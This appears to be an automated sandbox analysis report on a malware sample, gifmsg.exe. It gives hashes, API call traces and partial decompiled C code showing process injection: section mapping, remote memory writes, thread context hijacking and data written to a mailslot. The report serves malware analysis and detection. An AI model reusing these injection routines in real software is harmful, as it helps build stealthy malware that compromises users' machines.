  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: gifmsg.exe Analysis ID: 60136

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:5BDD37EDD3740A4E2DA2E05ABDC20A20
Total matches:34
Initial Analysis Report:Open
Initial sample Analysis ID:60136
Initial sample SHA 256:3D61067831E54523401557F16F776796142F313F41B2B12D48B017A7E06B48DD
Initial sample name:gifmsg.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
